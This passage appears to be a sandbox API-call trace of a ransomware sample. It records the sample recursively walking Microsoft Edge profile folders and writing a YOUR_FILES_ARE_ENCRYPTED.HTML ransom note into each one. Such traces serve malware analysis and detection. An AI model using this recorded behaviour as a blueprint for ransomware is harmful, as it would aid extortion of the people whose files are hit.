(hObject=0x320) returned 1 [0116.199] GetProcessHeap () returned 0x600000 [0116.199] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.199] GetProcessHeap () returned 0x600000 [0116.199] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0116.200] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87fe09a0, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x88079316, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x88079316, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.MicrosoftEdge_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.MIC")) returned 1 [0116.200] StrStrIW (lpFirst="Microsoft.MicrosoftEdge_8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.200] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe") returned 86 [0116.200] GetProcessHeap () returned 0x600000 [0116.200] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0116.201] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe" [0116.201] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\*" [0116.201] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87fe09a0, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x888ab4e8, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x888ab4e8, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x626638 [0116.201] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87fe09a0, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x888ab4e8, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x888ab4e8, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0116.201] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x88079316, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x4da5bc3, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4da5bc3, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0116.201] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.201] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC") returned 89 [0116.201] GetProcessHeap () returned 0x600000 [0116.202] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.202] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC" [0116.202] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\*" [0116.202] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x88079316, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x4da5bc3, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4da5bc3, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dda6, dwReserved1=0x315dcf8, cFileName=".", cAlternateFileName="")) returned 0x626778 [0116.203] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x88079316, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x4da5bc3, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4da5bc3, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dda6, dwReserved1=0x315dcf8, cFileName="..", cAlternateFileName="")) returned 1 [0116.203] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4da5bc3, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4f4954c, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4f4954c, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dda6, dwReserved1=0x315dcf8, cFileName="#!001", cAlternateFileName="")) returned 1 [0116.203] StrStrIW (lpFirst="#!001", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.203] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001") returned 95 [0116.203] GetProcessHeap () returned 0x600000 [0116.203] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0116.204] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001" [0116.204] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\*" [0116.204] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4da5bc3, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4f4954c, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4f4954c, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315dd00, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0116.205] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4da5bc3, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4f4954c, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4f4954c, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315dd00, cFileName="..", cAlternateFileName="")) returned 1 [0116.205] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4f4954c, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4f4954c, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4f4954c, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315dd00, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0116.205] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.205] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\INetCache") returned 105 [0116.205] GetProcessHeap () returned 0x600000 [0116.205] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3102fc8 [0116.206] lstrcpyW (in: lpString1=0x3102fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\INetCache" [0116.206] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\INetCache\\*" [0116.206] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\INetCache\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4f4954c, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4f4954c, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4f4954c, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185660, dwReserved1=0x31855a0, cFileName=".", cAlternateFileName="")) returned 0x626838 [0116.207] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4f4954c, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4f4954c, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4f4954c, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185660, dwReserved1=0x31855a0, cFileName="..", cAlternateFileName="")) returned 1 [0116.207] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4f4954c, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4f4954c, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4f4954c, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185660, dwReserved1=0x31855a0, cFileName="..", cAlternateFileName="")) returned 0 [0116.207] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0116.207] wnsprintfW (in: pszDest=0x3102fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 135 [0116.207] GetProcessHeap () returned 0x600000 [0116.207] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.207] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\#!001\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0116.208] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19de68, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19de68*=0x3c00, lpOverlapped=0x0) returned 1 [0116.209] CloseHandle (hObject=0x31c) returned 1 [0116.209] GetProcessHeap () returned 0x600000 [0116.209] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.209] GetProcessHeap () returned 0x600000 [0116.209] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3102fc8 | out: hHeap=0x600000) returned 1 [0116.210] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4f4954c, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4f4954c, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4f4954c, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315dd00, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0116.210] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.210] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\INetCookies") returned 107 [0116.210] GetProcessHeap () returned 0x600000 [0116.210] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3102fc8 [0116.211] lstrcpyW (in: lpString1=0x3102fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\INetCookies" [0116.211] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\INetCookies\\*" [0116.211] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\INetCookies\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4f4954c, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4f4954c, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4f4954c, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185660, dwReserved1=0x31855a0, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0116.211] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4f4954c, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4f4954c, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4f4954c, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185660, dwReserved1=0x31855a0, cFileName="..", cAlternateFileName="")) returned 1 [0116.211] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4f4954c, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4f4954c, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4f4954c, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185660, dwReserved1=0x31855a0, cFileName="..", cAlternateFileName="")) returned 0 [0116.211] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0116.211] wnsprintfW (in: pszDest=0x3102fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 137 [0116.211] GetProcessHeap () returned 0x600000 [0116.211] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.212] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\#!001\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0116.212] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19de68, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19de68*=0x3c00, lpOverlapped=0x0) returned 1 [0116.213] CloseHandle (hObject=0x31c) returned 1 [0116.213] GetProcessHeap () returned 0x600000 [0116.213] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.213] GetProcessHeap () returned 0x600000 [0116.213] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3102fc8 | out: hHeap=0x600000) returned 1 [0116.214] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4f4954c, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4f4954c, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4f4954c, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dc38, dwReserved1=0x315dd00, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0116.214] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.214] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\INetHistory") returned 107 [0116.214] GetProcessHeap () returned 0x600000 [0116.214] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3102fc8 [0116.215] lstrcpyW (in: lpString1=0x3102fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\INetHistory" [0116.215] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\INetHistory\\*" [0116.215] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\INetHistory\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4f4954c, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4f4954c, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4f4954c, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185660, dwReserved1=0x31855a0, cFileName=".", cAlternateFileName="")) returned 0x626838 [0116.215] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4f4954c, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4f4954c, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4f4954c, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185660, dwReserved1=0x31855a0, cFileName="..", cAlternateFileName="")) returned 1 [0116.215] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4f4954c, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4f4954c, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4f4954c, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185660, dwReserved1=0x31855a0, cFileName="..", cAlternateFileName="")) returned 0 [0116.215] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0116.215] wnsprintfW (in: pszDest=0x3102fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 137 [0116.215] GetProcessHeap () returned 0x600000 [0116.215] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.216] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\#!001\\inethistory\\your_files_are_encrypted.html"), 